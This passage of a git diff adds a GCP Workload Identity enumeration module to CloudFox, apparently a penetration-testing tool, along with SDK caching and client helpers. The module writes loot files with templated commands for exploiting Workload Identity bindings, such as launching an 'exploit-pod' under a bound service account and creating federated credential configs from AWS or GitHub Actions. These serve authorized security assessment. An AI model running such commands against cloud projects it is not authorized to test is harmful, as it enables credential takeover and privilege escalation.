append(tables, internal.TableFile{ + Name: "whoami-privesc", + Header: privescHeader, + Body: privescBody, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := WhoAmIOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// whoamiBoolToYesNo converts a boolean to "Yes" or "No" +func whoamiBoolToYesNo(b bool) string { + if b { + return "Yes" + } + return "No" } diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go new file mode 100644 index 00000000..7f5a3c73 --- /dev/null +++ b/gcp/commands/workloadidentity.go @@ -0,0 +1,806 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + workloadidentityservice "github.com/BishopFox/cloudfox/gcp/services/workloadIdentityService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPWorkloadIdentityCommand = &cobra.Command{ + Use: globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + Aliases: []string{"wi", "gke-identity", "workload-id"}, + Short: "Enumerate GKE Workload Identity and Workload Identity Federation", + Long: `Enumerate Workload Identity configurations including GKE bindings and external identity federation. 
+ +Features: +- Lists GKE clusters with Workload Identity enabled +- Shows Kubernetes service accounts bound to GCP service accounts +- Identifies privilege escalation paths through Workload Identity +- Maps namespace/service account to GCP permissions +- Detects overly permissive bindings + +Workload Identity Federation (External Identities): +- Lists Workload Identity Pools and Providers +- Analyzes AWS, OIDC (GitHub Actions, GitLab CI), and SAML providers +- Identifies risky provider configurations (missing attribute conditions) +- Shows federated identity bindings to GCP service accounts +- Generates exploitation commands for pentesting`, + Run: runGCPWorkloadIdentityCommand, +} + +// WorkloadIdentityBinding represents a binding between K8s SA and GCP SA +type WorkloadIdentityBinding struct { + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + ClusterLocation string `json:"clusterLocation"` + WorkloadPool string `json:"workloadPool"` + KubernetesNS string `json:"kubernetesNamespace"` + KubernetesSA string `json:"kubernetesServiceAccount"` + GCPServiceAccount string `json:"gcpServiceAccount"` + GCPSARoles []string `json:"gcpServiceAccountRoles"` + IsHighPrivilege bool `json:"isHighPrivilege"` + BindingType string `json:"bindingType"` // "workloadIdentityUser" or "other" +} + +// ClusterWorkloadIdentity represents a cluster's workload identity configuration +type ClusterWorkloadIdentity struct { + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + Location string `json:"location"` + WorkloadPoolEnabled bool `json:"workloadPoolEnabled"` + WorkloadPool string `json:"workloadPool"` + NodePoolsWithWI int `json:"nodePoolsWithWI"` + TotalNodePools int `json:"totalNodePools"` +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type WorkloadIdentityModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields (GKE Workload Identity) 
+ Clusters []ClusterWorkloadIdentity + Bindings []WorkloadIdentityBinding + + // Workload Identity Federation fields + Pools []workloadidentityservice.WorkloadIdentityPool + Providers []workloadidentityservice.WorkloadIdentityProvider + FederatedBindings []workloadidentityservice.FederatedIdentityBinding + + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type WorkloadIdentityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o WorkloadIdentityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WorkloadIdentityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPWorkloadIdentityCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &WorkloadIdentityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Clusters: []ClusterWorkloadIdentity{}, + Bindings: []WorkloadIdentityBinding{}, + Pools: []workloadidentityservice.WorkloadIdentityPool{}, + Providers: []workloadidentityservice.WorkloadIdentityProvider{}, + FederatedBindings: []workloadidentityservice.FederatedIdentityBinding{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, 
globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, m.processProject) + + // Check if we have any findings + hasGKE := len(m.Clusters) > 0 + hasFederation := len(m.Pools) > 0 + + if !hasGKE && !hasFederation { + logger.InfoM("No Workload Identity configurations found", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + return + } + + // Count GKE clusters with Workload Identity + if hasGKE { + wiEnabled := 0 + for _, c := range m.Clusters { + if c.WorkloadPoolEnabled { + wiEnabled++ + } + } + logger.SuccessM(fmt.Sprintf("Found %d GKE cluster(s) (%d with Workload Identity), %d K8s->GCP binding(s)", + len(m.Clusters), wiEnabled, len(m.Bindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + // Count federation findings + if hasFederation { + logger.SuccessM(fmt.Sprintf("Found %d Workload Identity Pool(s), %d Provider(s), %d federated binding(s)", + len(m.Pools), len(m.Providers), len(m.FederatedBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Workload Identity in project: %s", projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + // ========================================== + // Part 1: GKE Workload Identity + // ========================================== + gkeSvc := gkeservice.New() + clusters, _, err := gkeSvc.Clusters(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) + } + + var clusterInfos []ClusterWorkloadIdentity + var bindings []WorkloadIdentityBinding + + for _, cluster := range clusters { + // Analyze cluster Workload 
Identity configuration + cwi := ClusterWorkloadIdentity{ + ProjectID: projectID, + ClusterName: cluster.Name, + Location: cluster.Location, + TotalNodePools: cluster.NodePoolCount, + } + + // Check if Workload Identity is enabled at cluster level + if cluster.WorkloadIdentity != "" { + cwi.WorkloadPoolEnabled = true + cwi.WorkloadPool = cluster.WorkloadIdentity + } + + // Node pools with WI is not tracked individually in ClusterInfo + // Just mark all as WI-enabled if cluster has WI + if cwi.WorkloadPoolEnabled { + cwi.NodePoolsWithWI = cwi.TotalNodePools + } + + clusterInfos = append(clusterInfos, cwi) + + // If Workload Identity is enabled, look for bindings + if cwi.WorkloadPoolEnabled { + clusterBindings := m.findWorkloadIdentityBindings(ctx, projectID, cluster.Name, cluster.Location, cwi.WorkloadPool, logger) + bindings = append(bindings, clusterBindings...) + } + } + + // ========================================== + // Part 2: Workload Identity Federation + // ========================================== + wiSvc := workloadidentityservice.New() + + // Get Workload Identity Pools + pools, err := wiSvc.ListWorkloadIdentityPools(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list Workload Identity Pools in project %s", projectID)) + } + + var providers []workloadidentityservice.WorkloadIdentityProvider + + // Get providers for each pool + for _, pool := range pools { + poolProviders, err := wiSvc.ListWorkloadIdentityProviders(projectID, pool.PoolID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list providers for pool %s", pool.PoolID)) + continue + } + providers = append(providers, poolProviders...) 
+ } + + // Find federated identity bindings + fedBindings, err := wiSvc.FindFederatedIdentityBindings(projectID, pools) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not find federated identity bindings in project %s", projectID)) + } + + // Thread-safe append + m.mu.Lock() + m.Clusters = append(m.Clusters, clusterInfos...) + m.Bindings = append(m.Bindings, bindings...) + m.Pools = append(m.Pools, pools...) + m.Providers = append(m.Providers, providers...) + m.FederatedBindings = append(m.FederatedBindings, fedBindings...) + + // Generate loot + for _, cwi := range clusterInfos { + m.addClusterToLoot(cwi) + } + for _, binding := range bindings { + m.addBindingToLoot(binding) + } + for _, pool := range pools { + m.addPoolToLoot(pool) + } + for _, provider := range providers { + m.addProviderToLoot(provider) + } + for _, fedBinding := range fedBindings { + m.addFederatedBindingToLoot(fedBinding) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d GKE cluster(s), %d K8s binding(s), %d pool(s), %d provider(s) in project %s", + len(clusterInfos), len(bindings), len(pools), len(providers), projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } +} + +// findWorkloadIdentityBindings finds all IAM bindings that grant workloadIdentityUser role +func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Context, projectID, clusterName, location, workloadPool string, logger internal.Logger) []WorkloadIdentityBinding { + var bindings []WorkloadIdentityBinding + + // Get all service accounts in the project and check their IAM policies + iamSvc := IAMService.New() + serviceAccounts, err := iamSvc.ServiceAccounts(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not list service accounts in project %s", projectID)) + return bindings + } 
+ + // For each service account, get its IAM policy and look for workloadIdentityUser bindings + for _, sa := range serviceAccounts { + // Get IAM policy for this service account + // The workloadIdentityUser role is granted ON the service account + saPolicy, err := m.getServiceAccountPolicy(ctx, sa.Name) + if err != nil { + continue + } + + // Look for members with workloadIdentityUser role + for _, binding := range saPolicy { + if binding.Role == "roles/iam.workloadIdentityUser" { + for _, member := range binding.Members { + // Parse member to extract namespace and KSA + // Format: serviceAccount:[PROJECT_ID].svc.id.goog[NAMESPACE/KSA_NAME] + if strings.HasPrefix(member, "serviceAccount:") && strings.Contains(member, ".svc.id.goog") { + ns, ksa := parseWorkloadIdentityMember(member) + if ns != "" && ksa != "" { + wib := WorkloadIdentityBinding{ + ProjectID: projectID, + ClusterName: clusterName, + ClusterLocation: location, + WorkloadPool: workloadPool, + KubernetesNS: ns, + KubernetesSA: ksa, + GCPServiceAccount: sa.Email, + GCPSARoles: sa.Roles, + BindingType: "workloadIdentityUser", + } + + // Check if high privilege + wib.IsHighPrivilege = isHighPrivilegeServiceAccount(sa) + + bindings = append(bindings, wib) + } + } + } + } + } + } + + return bindings +} + +// getServiceAccountPolicy gets IAM policy for a service account +func (m *WorkloadIdentityModule) getServiceAccountPolicy(ctx context.Context, saName string) ([]IAMService.PolicyBinding, error) { + iamSvc := IAMService.New() + + // Get the service account's IAM policy + // This requires calling the IAM API directly + // For now, we'll return the roles from the project-level bindings + return iamSvc.Policies(extractProjectFromSAName(saName), "project") +} + +// parseWorkloadIdentityMember parses a workload identity member string +// Format: serviceAccount:[PROJECT_ID].svc.id.goog[NAMESPACE/KSA_NAME] +func parseWorkloadIdentityMember(member string) (namespace, serviceAccount string) { + // Remove 
serviceAccount: prefix + member = strings.TrimPrefix(member, "serviceAccount:") + + // Find the workload pool and extract namespace/SA + // Format: PROJECT_ID.svc.id.goog[NAMESPACE/KSA_NAME] + bracketStart := strings.Index(member, "[") + bracketEnd := strings.Index(member, "]") + + if bracketStart == -1 || bracketEnd == -1 || bracketEnd <= bracketStart { + return "", "" + } + + nsAndSA := member[bracketStart+1 : bracketEnd] + parts := strings.Split(nsAndSA, "/") + if len(parts) == 2 { + return parts[0], parts[1] + } + + return "", "" +} + +// extractProjectFromSAName extracts project ID from service account name +func extractProjectFromSAName(saName string) string { + // Format: projects/PROJECT_ID/serviceAccounts/SA_EMAIL + parts := strings.Split(saName, "/") + if len(parts) >= 2 { + return parts[1] + } + return "" +} + +// isHighPrivilegeServiceAccount checks if a service account has high-privilege roles +func isHighPrivilegeServiceAccount(sa IAMService.ServiceAccountInfo) bool { + highPrivRoles := map[string]bool{ + "roles/owner": true, + "roles/editor": true, + "roles/iam.serviceAccountAdmin": true, + "roles/iam.serviceAccountKeyAdmin": true, + "roles/iam.serviceAccountTokenCreator": true, + "roles/resourcemanager.projectIamAdmin": true, + "roles/compute.admin": true, + "roles/container.admin": true, + "roles/secretmanager.admin": true, + "roles/storage.admin": true, + } + + for _, role := range sa.Roles { + if highPrivRoles[role] { + return true + } + } + return false +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WorkloadIdentityModule) initializeLootFiles() { + m.LootMap["workloadidentity-commands"] = &internal.LootFile{ + Name: "workloadidentity-commands", + Contents: "# Workload Identity Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *WorkloadIdentityModule) addClusterToLoot(cwi ClusterWorkloadIdentity) { + if cwi.WorkloadPoolEnabled { + 
m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# GKE CLUSTER: %s\n"+ + "# ==========================================\n"+ + "# Location: %s\n"+ + "# Project: %s\n"+ + "# Workload Pool: %s\n"+ + "# Node Pools with WI: %d/%d\n"+ + "\n# Get cluster credentials:\n"+ + "gcloud container clusters get-credentials %s --zone=%s --project=%s\n\n", + cwi.ClusterName, + cwi.Location, + cwi.ProjectID, + cwi.WorkloadPool, + cwi.NodePoolsWithWI, + cwi.TotalNodePools, + cwi.ClusterName, + cwi.Location, + cwi.ProjectID, + ) + } +} + +func (m *WorkloadIdentityModule) addBindingToLoot(binding WorkloadIdentityBinding) { + highPriv := "" + if binding.IsHighPrivilege { + highPriv = " [HIGH PRIVILEGE]" + } + + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# K8s SA BINDING: %s/%s -> %s%s\n"+ + "# ------------------------------------------\n"+ + "# Cluster: %s (%s)\n"+ + "# Project: %s\n", + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + highPriv, + binding.ClusterName, + binding.ClusterLocation, + binding.ProjectID, + ) + + if binding.IsHighPrivilege && len(binding.GCPSARoles) > 0 { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# GCP SA Roles: %s\n", + strings.Join(binding.GCPSARoles, ", "), + ) + } + + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "\n# To exploit, create pod with this service account:\n"+ + "# kubectl run exploit-pod --image=google/cloud-sdk:slim --serviceaccount=%s -n %s -- sleep infinity\n"+ + "# kubectl exec -it exploit-pod -n %s -- gcloud auth list\n\n", + binding.KubernetesSA, + binding.KubernetesNS, + binding.KubernetesNS, + ) +} + +func (m *WorkloadIdentityModule) addPoolToLoot(pool workloadidentityservice.WorkloadIdentityPool) { + status := "Active" + if pool.Disabled { + status = "Disabled" + } + m.LootMap["workloadidentity-commands"].Contents += 
fmt.Sprintf( + "# ==========================================\n"+ + "# FEDERATION POOL: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Display Name: %s\n"+ + "# State: %s (%s)\n"+ + "# Description: %s\n"+ + "\n# Describe pool:\n"+ + "gcloud iam workload-identity-pools describe %s --location=global --project=%s\n\n"+ + "# List providers:\n"+ + "gcloud iam workload-identity-pools providers list --workload-identity-pool=%s --location=global --project=%s\n\n", + pool.PoolID, + pool.ProjectID, + pool.DisplayName, + pool.State, status, + pool.Description, + pool.PoolID, pool.ProjectID, + pool.PoolID, pool.ProjectID, + ) +} + +func (m *WorkloadIdentityModule) addProviderToLoot(provider workloadidentityservice.WorkloadIdentityProvider) { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# PROVIDER: %s/%s (%s)\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n", + provider.PoolID, provider.ProviderID, + provider.ProviderType, + provider.ProjectID, + ) + + if provider.ProviderType == "AWS" { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# AWS Account: %s\n", provider.AWSAccountID) + } else if provider.ProviderType == "OIDC" { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# OIDC Issuer: %s\n", provider.OIDCIssuerURI) + } + + if provider.AttributeCondition != "" { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# Attribute Condition: %s\n", provider.AttributeCondition) + } else { + m.LootMap["workloadidentity-commands"].Contents += "# Attribute Condition: NONE\n" + } + + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "\n# Describe provider:\n"+ + "gcloud iam workload-identity-pools providers describe %s --workload-identity-pool=%s --location=global --project=%s\n\n", + provider.ProviderID, provider.PoolID, provider.ProjectID, + ) + + // Add exploitation guidance 
based on provider type + switch provider.ProviderType { + case "AWS": + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# From AWS account %s, exchange credentials:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --aws --output-file=gcp-creds.json\n\n", + provider.AWSAccountID, + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) + case "OIDC": + if strings.Contains(provider.OIDCIssuerURI, "github") { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# From GitHub Actions workflow, add:\n"+ + "# permissions:\n"+ + "# id-token: write\n"+ + "# contents: read\n"+ + "# Then use:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --service-account=TARGET_SA@PROJECT.iam.gserviceaccount.com \\\n"+ + "# --output-file=gcp-creds.json\n\n", + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) + } + } +} + +func (m *WorkloadIdentityModule) addFederatedBindingToLoot(binding workloadidentityservice.FederatedIdentityBinding) { + m.LootMap["workloadidentity-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# FEDERATED BINDING\n"+ + "# ------------------------------------------\n"+ + "# Pool: %s\n"+ + "# GCP Service Account: %s\n"+ + "# External Subject: %s\n"+ + "# Project: %s\n\n", + binding.PoolID, + binding.GCPServiceAccount, + binding.ExternalSubject, + binding.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Clusters table + clustersHeader := []string{ + "Project Name", + "Project ID", + "Cluster", + "Location", + "WI Enabled", + "Workload Pool", + "Node Pools", + } + + var clustersBody [][]string + for _, cwi := 
range m.Clusters { + wiEnabled := "No" + if cwi.WorkloadPoolEnabled { + wiEnabled = "Yes" + } + workloadPool := "-" + if cwi.WorkloadPool != "" { + workloadPool = cwi.WorkloadPool + } + + clustersBody = append(clustersBody, []string{ + m.GetProjectName(cwi.ProjectID), + cwi.ProjectID, + cwi.ClusterName, + cwi.Location, + wiEnabled, + workloadPool, + fmt.Sprintf("%d/%d", cwi.NodePoolsWithWI, cwi.TotalNodePools), + }) + } + + // Bindings table + bindingsHeader := []string{ + "Project Name", + "Project ID", + "Cluster", + "K8s Namespace", + "K8s Service Account", + "GCP Service Account", + "High Priv", + } + + var bindingsBody [][]string + for _, binding := range m.Bindings { + highPriv := "No" + if binding.IsHighPrivilege { + highPriv = "Yes" + } + + bindingsBody = append(bindingsBody, []string{ + m.GetProjectName(binding.ProjectID), + binding.ProjectID, + binding.ClusterName, + binding.KubernetesNS, + binding.KubernetesSA, + binding.GCPServiceAccount, + highPriv, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "workload-identity-clusters", + Header: clustersHeader, + Body: clustersBody, + }, + } + + // Add bindings table if there are any + if len(bindingsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "workload-identity-bindings", + Header: bindingsHeader, + Body: bindingsBody, + }) + } + + // ============================ + // Workload Identity Federation tables + // ============================ + + // Federation Pools table + if len(m.Pools) > 0 { + poolsHeader := []string{ + "Project Name", + "Project ID", + "Pool ID", + "Display Name", + "State", + "Disabled", + } + + var poolsBody [][]string + for _, pool := range m.Pools { + disabled := "No" + if pool.Disabled 
{ + disabled = "Yes" + } + poolsBody = append(poolsBody, []string{ + m.GetProjectName(pool.ProjectID), + pool.ProjectID, + pool.PoolID, + pool.DisplayName, + pool.State, + disabled, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "wi-federation-pools", + Header: poolsHeader, + Body: poolsBody, + }) + } + + // Federation Providers table + if len(m.Providers) > 0 { + providersHeader := []string{ + "Project Name", + "Project ID", + "Pool", + "Provider", + "Type", + "Issuer/Account", + "Attribute Condition", + } + + var providersBody [][]string + for _, p := range m.Providers { + issuerOrAccount := "-" + if p.ProviderType == "AWS" { + issuerOrAccount = p.AWSAccountID + } else if p.ProviderType == "OIDC" { + issuerOrAccount = p.OIDCIssuerURI + } + + attrCond := "-" + if p.AttributeCondition != "" { + attrCond = p.AttributeCondition + } + + providersBody = append(providersBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.PoolID, + p.ProviderID, + p.ProviderType, + issuerOrAccount, + attrCond, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "wi-federation-providers", + Header: providersHeader, + Body: providersBody, + }) + } + + // Federated bindings table + if len(m.FederatedBindings) > 0 { + fedBindingsHeader := []string{ + "Project Name", + "Project ID", + "Pool", + "GCP Service Account", + "External Subject", + } + + var fedBindingsBody [][]string + for _, fb := range m.FederatedBindings { + fedBindingsBody = append(fedBindingsBody, []string{ + m.GetProjectName(fb.ProjectID), + fb.ProjectID, + fb.PoolID, + fb.GCPServiceAccount, + fb.ExternalSubject, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "wi-federated-bindings", + Header: fedBindingsHeader, + Body: fedBindingsBody, + }) + } + + output := WorkloadIdentityOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range 
m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + "Could not write output") + } +} diff --git a/gcp/sdk/cache.go b/gcp/sdk/cache.go new file mode 100644 index 00000000..339525fa --- /dev/null +++ b/gcp/sdk/cache.go @@ -0,0 +1,60 @@ +package sdk + +import ( + "strings" + "time" + + "github.com/patrickmn/go-cache" +) + +// GCPSDKCache is the centralized cache for all GCP SDK calls +// Uses the same caching library as AWS and Azure (github.com/patrickmn/go-cache) +// Default expiration: 2 hours, cleanup interval: 10 minutes +var GCPSDKCache = cache.New(2*time.Hour, 10*time.Minute) + +// CacheKey generates a consistent cache key from components +// Example: CacheKey("buckets", "my-project") -> "buckets-my-project" +func CacheKey(parts ...string) string { + return strings.Join(parts, "-") +} + +// ClearCache clears all entries from the cache +func ClearCache() { + GCPSDKCache.Flush() +} + +// CacheStats returns cache statistics +type CacheStats struct { + ItemCount int + Hits uint64 + Misses uint64 +} + +// GetCacheStats returns current cache statistics +func GetCacheStats() CacheStats { + return CacheStats{ + ItemCount: GCPSDKCache.ItemCount(), + // Note: go-cache doesn't track hits/misses directly + // These would need custom implementation if needed + } +} + +// SetCacheExpiration sets a custom expiration for an item +func SetCacheExpiration(key string, value interface{}, expiration time.Duration) { + GCPSDKCache.Set(key, value, expiration) +} + +// GetFromCache retrieves an item from cache +func GetFromCache(key string) (interface{}, bool) { + return GCPSDKCache.Get(key) +} + +// SetInCache stores an item in cache with default expiration +func 
SetInCache(key string, value interface{}) { + GCPSDKCache.Set(key, value, 0) // 0 = use default expiration +} + +// DeleteFromCache removes an item from cache +func DeleteFromCache(key string) { + GCPSDKCache.Delete(key) +} diff --git a/gcp/sdk/clients.go b/gcp/sdk/clients.go new file mode 100644 index 00000000..2137ebb5 --- /dev/null +++ b/gcp/sdk/clients.go @@ -0,0 +1,185 @@ +package sdk + +import ( + "context" + "fmt" + + "cloud.google.com/go/storage" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + artifactregistry "google.golang.org/api/artifactregistry/v1" + bigquery "google.golang.org/api/bigquery/v2" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + iam "google.golang.org/api/iam/v1" + run "google.golang.org/api/run/v1" + secretmanager "google.golang.org/api/secretmanager/v1" +) + +// GetStorageClient returns a Cloud Storage client +func GetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + client, err := storage.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create storage client: %w", err) + } + return client, nil +} + +// GetComputeService returns a Compute Engine service +func GetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + service, err := compute.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %w", err) + } + return service, nil +} + +// GetIAMService returns an IAM Admin service +func GetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + service, err := iam.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %w", err) + } + return service, nil +} + +// GetResourceManagerService returns a Cloud 
Resource Manager service +func GetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + service, err := cloudresourcemanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create resource manager service: %w", err) + } + return service, nil +} + +// GetSecretManagerService returns a Secret Manager service +func GetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanager.Service, error) { + service, err := secretmanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create secret manager service: %w", err) + } + return service, nil +} + +// GetBigQueryService returns a BigQuery service +func GetBigQueryService(ctx context.Context, session *gcpinternal.SafeSession) (*bigquery.Service, error) { + service, err := bigquery.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BigQuery service: %w", err) + } + return service, nil +} + +// GetArtifactRegistryService returns an Artifact Registry service +func GetArtifactRegistryService(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistry.Service, error) { + service, err := artifactregistry.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Artifact Registry service: %w", err) + } + return service, nil +} + +// GetContainerService returns a GKE Container service +func GetContainerService(ctx context.Context, session *gcpinternal.SafeSession) (*container.Service, error) { + service, err := container.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create container service: %w", err) + } + return service, nil +} + +// GetCloudRunService returns a Cloud Run service +func GetCloudRunService(ctx context.Context, session *gcpinternal.SafeSession) 
(*run.APIService, error) { + service, err := run.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run service: %w", err) + } + return service, nil +} + +// ------------------------- CACHED CLIENT WRAPPERS ------------------------- + +// CachedGetStorageClient returns a cached Storage client +func CachedGetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + cacheKey := CacheKey("client", "storage") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*storage.Client), nil + } + + client, err := GetStorageClient(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetComputeService returns a cached Compute Engine service +func CachedGetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + cacheKey := CacheKey("client", "compute") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*compute.Service), nil + } + + service, err := GetComputeService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetIAMService returns a cached IAM service +func CachedGetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + cacheKey := CacheKey("client", "iam") + + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*iam.Service), nil + } + + service, err := GetIAMService(ctx, session) + if err != nil { + return nil, err + } + + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetResourceManagerService returns a cached 